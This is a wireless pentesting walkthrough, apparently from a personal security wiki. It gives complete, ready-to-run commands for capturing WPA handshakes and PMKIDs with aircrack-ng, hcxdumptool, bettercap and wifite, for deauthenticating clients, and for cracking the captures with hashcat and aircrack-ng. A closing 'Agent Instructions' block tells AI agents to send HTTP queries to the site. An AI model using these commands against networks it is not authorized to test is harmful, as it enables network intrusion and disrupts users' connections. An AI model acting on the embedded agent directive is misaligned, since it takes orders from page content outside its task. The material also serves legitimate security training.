# Wireless Pentesting

This will be a walkthrough used to obtain wireless handshakes and [PMKID](https://hashcat.net/forum/thread-7717.html) using various tools such as Aircrack-ng, HCXDumptool, Bettercap, and [Wifite](https://github.com/kimocoder/wifite2).

Then we will crack the hashes using [Hcxtools](https://github.com/ZerBea/hcxtools) and Hashcat

This will require having a WiFi Adapter that supports monitor mode, also known as packet injection.

I myself have and recommend these adapters:

* [Alfa AWUS036ACM](https://www.amazon.com/Alfa-AWUS036ACM-Long-Range-Dual-Band-Wireless/dp/B073X6RL9D) <-- Capable of 2.4GHz and 5GHz
* [Alfa AWUS036ACHM](https://www.amazon.com/gp/product/B08SJBV1N3/ref=ox_sc_act_title_1?smid=A20G3A026MV70R\&psc=1) <-- Capable of 2.4GHz and 5GHz
* [Alfa AWUS036ACH](https://www.amazon.com/dp/B08SJC78FH?ref_=cm_sw_r_cp_ud_dp_PSZZG6J9X0XH40GXB685) <-- Capable of 2.4GHz and 5GHz (This more than likely \*will\* require driver installation)
* [Panda Wireless PAU09 N600](https://www.amazon.com/Panda-Wireless-PAU09-Adapter-Antennas/dp/B01LY35HGO) <-- Capable of 2.4GHz and 5GHz
* [Alfa AWUS036NEH](https://www.amazon.com/AWUS036NEH-Range-WIRELESS-802-11b-USBAdapter/dp/B0035OCVO6)
* [Alfa AWUS036NH](https://www.amazon.com/Alfa-AWUS036NH-802-11g-Wireless-Long-Range/dp/B003YIFHJY)
* [Panda Wireless PAU05](https://www.amazon.com/Panda-300Mbps-Wireless-USB-Adapter/dp/B00EQT0YK2)
* [TP-Link TL-WN722N](https://www.amazon.com/TP-Link-TL-WN722N-Wireless-network-Adapter/dp/B002SZEOLG)
* [Ralink USB WiFi RT5370](https://www.amazon.com/Ralink-RT5370-Raspberry-Adapter-Function/dp/B019XUDHFC)

## Aircrack-ng

Find your interface. If you have one network card(capable of monitor mode/packet injection) it will be `wlan0`, but if you have a second wireless USB dongle, it will most likely be `wlan1`.

```
iwconfig
```

!\[\[image 243.png]]

Put interface into monitor mode

```shell-session
sudo airmon-ng start wlan1
```

!\[\[image 244.png]]

Now we start scanning for networks doing some recon.

```
sudo airodump-ng wlan1mon
```

!\[\[image 245.png]]

Once we have found our target(s), we press `CTRL+C` to stop the scan

Now we focus our scan onto our target

```
sudo airodump-ng wlan1mon -c CH# --essid "SSID" -w outfile
```

!\[\[image 246.png]]

We can name the .cap file whatever we want, I typically just name it the targets SSID

Now we can see here at the bottom, we see `BSSID`, `STATION`, `PWR`, `Rate`, `Lost`, etc. this indicates if a device is connected to that network. This may not *always* show devices but is helpful to keep an eye on.

At this point we can simply wait for a device to connect to the network to obtain the handshake, or we send deauth packets to the network to force a device to reconnect to the network to obtain the handshake. We can do this in various ways.

In a second terminal we will send 10 deauthentication packets to the network and stop.

```
sudo aireplay-ng -0 10 -a BSSID wlan1mon
```

!\[\[image 247.png]]

We can also deauthenticate a specific device that is connected to the network with

```
sudo aireplay-ng -0 10 -a BSSID -c STATION wlan1mon
```

!\[\[image 248.png]]

Once we have obtained the handshake, we will see our airodump terminal change, it will specify in the top right with `WPA Handshake: BSSID`.

!\[\[image 249.png]]

Note: We can also obtain PMKID with this method as well if the AP is vulnerable to that attack.

This is handshake is saved into the .cap file we specified we when target our airodump-ng scan. Once we have a handshake from aircrack, we will want to turn it into a hashcat compatible file. First we want to extract the handshake from the .cap file

<pre><code><strong>sudo aircrack-ng -j handshake capture.cap
</strong></code></pre>

!\[\[image 250.png]]

OR using HCXDumptool

```
sudo hcxpcapngtool -o SSIDHash outfile.cap
```

!\[\[image 251.png]]

!\[\[image 252.png]]

***

## HCXDumptool

This may depends on which version you have installed. Eg. v6.2.9 has a different interface than v6.3.0+. I'll be going with the most up to date (currently v.6.3.5)

**This attack is not guaranteed!!**. Not all access points(APs) are vulnerable to the PMKID attack, BUT this can still obtain us EAPOL M1M2M3 or EAPOL M1M2M3M4 auths.

[Info on PMKID on Hashcat Forums](https://hashcat.net/forum/thread-7717.html)

Like other methods, we find out interface and put it into monitor mode.

```shell-session
sudo airmon-ng start wlan1
```

### HCXDumptool v6.2.9

```
hcxdumptool -o (name).pcapng -i (interface) --enable_status=1 --filterlist_ap=target.txt --filtermode=2
```

!\[\[image 253.png]]

Once we obtain our PMKID we will see it at the bottom

!\[\[image 254.png]]

We MAY see `PMKID:XXXXXXXXXXXXXXX` OR `PMKIDROGUE:XXXXXXXXXXXXXXX`, Even potentially `M1M2ROGUE: XXXXXXXXXXXXXXX`.

* `PMKID:XXXXXXXXXXXXXXX KDV:2` means You captured a PMKID requested from a CLIENT. WPA version (Key Descriptor Version) is WPA 2. You can recover the password from this.
* PMKIDROGUE:`XXXXXXXXXXXXXXX KDV:2` means the PMKID is requested by hcxdumptool and not by a CLIENT. You can recover the password from this.
* `M1M2ROGUE : EAPOL M2` is requested from a CLIENT by hcxdumptool and not from an ACCESS POINT. You can recover the password from this.

### HCXDumptool v6.3.0+

To target AP(s) we scan for target(s) with airodump-ng

```
sudo airodump-ng wlan1mon
```

!\[\[image 255.png]]

Grab the BSSID(s) of our targets and put them in a Berkeley Packet Filter (BPF) `.bpf` file. with tcpdump OR hcxdumptool.

TCPDump

```
tcpdump -s 65535 -y IEEE802_11_RADIO wlan addr3 BSSID -ddd > SSID.bpf
```

!\[\[image 256.png]]

HCXDumptool

```
hcxdumptool --bpfc="wlan addr3 BSSID" > SSID.bpf
```

\*\* NOTE: We can target multiple APs

TCPDump:

```
tcpdump -s 65535 -y IEEE802_11_RADIO wlan addr3 BSSID or wlan addr3 BSSID2 -ddd > SSID.bpf
```

HCXDumptool:

```
hcxdumptool --bpfc="wlan addr3 BSSID1 or wlan addr3 BSSID2" > SSID.bpf
```

Now run it against our target

```
sudo hcxdumptool --rds=1 -F --bpf=SSID.bpf -i wlan1mon -w outfile.pcapng
```

***

To target all APs around(Not recommended without given permission)

```shell-session
sudo hcxdumptool -i wlan1mon -w outfile.pcapng
```

After a while we may see the + under the 3 or P of our target. Both of which can be used to obain the password with hashcat.

***

## Bettercap

### Handshake

Like with aircrack, we find out interface and put it into monitor mode.

Now we start bettercap selecting our interface

```
bettercap -iface (interface)
```

We begin scanning for networks

```
wifi.recon on
```

We can also show the WiFi Manufacturer of the AP

```
set wifi.show.manufacturer true
```

```
wifi.show
```

```
set wifi.recon.channel (Channel)
```

```
set net.sniff.verbose true
```

```
set net.sniff.output (SSID).pcap
```

```
set net.sniff on
```

```
events.stream on
```

At this point we can again, simply wait for a device to connect to the network to obtain the handshake, or we may deauthenticate the network.

```
wifi.deauth (BSSID)
```

Once we obtain the handshake, we will see the notification in our event stream

### PMKID

The PMKID method is much simpler method. Just like before, we find our interface, enable monitor mode, start bettercap with that interface.

We begin scanning for networks

```
wifi.recon on
```

We can also show the WiFi Manufacturer of the AP

```
set wifi.show.manufacturer true
```

```
wifi.show
```

To start the PMKID attack we simply run

```
wifi.assoc (BSSID)
```

Once we have successfully received the RSN frame containing PMKID and it has been saved in a pcap format

## Wifite

Specify a wireless interface with

```
sudo wifite -i wlan0
```

OR if we only have one WiFi interface on that is capable of monitor mode, we can just run it as is.

We can do a WPA attack on a target network with

```
sudo wifite --wpa
```

This will enable monitor mode on the wireless interface and begin scanning for networks.

This starts with a PMKID attack, then moves onto a WPA Handshake attack if a PMKID is unable to be obtained.

\*Note, we can skip the PMKID attack by adding the argument `--no-pmkid`

When obtaining a WPA handshake attack, this will attempt to de-authenticate clients from the network until we have obtained the handshake.

When the handshake is captured we see where it was saved to with the name of it. It will attempt to crack it automatically with `aircrack-ng` using their default worldlist `wordlist-probably.txt`

If you would like to use your own dictionary, such as `rockyou.txt` we can use the `--dict` argument.

## Hash Cracking

So we now have our handshake in .cap format, we can crack the hash and find out the password.

### Aircrack

We'll start with `aircrack-ng` as that is what we originally captured our handshake with. When we chose the `-w` output with the SSID name, or whatever name you chose, the files are saved in whatever directory you ran that `airodump-ng` command from. You may have multiple files in there with that SSID name. Eg. `Pixel.cap-01.cap`, `Pixel.cap-02.cap`, `Pixel.cap-03.cap`, etc. The handshake *SHOULD* be in the most recent one, the one with the highest number. So lets run aircrack against that .cap file.

```
sudo aircrack-ng -w (wordlist) (.cap file)
```

Now depending on the password and the dictionary you chose, this may take some time. I chose to attack my phones hotspot as I am allowed to attack my own devices and made the password simple enough that the basic rockyou.txt file could crack it with ease. Once it has found it the cracking will stop and will tell you the password.

### Hashcat

We have our PMKID in the .pcapng format, we can use hashcat to crack it. First we must use the `hcxpcapng` tool from [HCXtools](https://github.com/ZerBea/hcxtools).

```
sudo hcxpcapngtool -o SSIDHash outfile.cap (or .pcapng)
```

#### Dictionary

If we want to use a dictionary attack, like using `rockyou.txt` for example

```
sudo hashcat -m 22000 SSIDHash wordlist
```

Depending on your hardware, the dictionary you chose, and the password, this may take some time. You can press S for a status to see the time time estimated on finishing, as well as the updated "Recovered.Total" to see the recovered keys"

We can run the same command again with --show appended to the end to see our cracked passwords.

#### Brute Force

If we wanted to run a brute force attack rather than a dictionary attack, it's a similar command

```
hashcat -a 3 -w 3 -m 22000 (hash file) '?l?l?l?l?l?l?l'
```

Replace the `?l` with whatever we deem fit.

* ?l = a-z
* ?u = A-Z
* ?d = 0-9
* ?h = 0-9a-f
* ?H = 0-9A-F
* ?s = !"#$%&'()\*+,-./:;<=>?@\[]^\_\`{|}\~
* ?a = ?l?u?d?s
* ?b = 0x00 - 0xff

This will cover the basics of the hash cracking with hashcat but it can get SO much more advanced with hashcat.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://cybersec.th4ntis.com/processes/wireless-pentesting.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.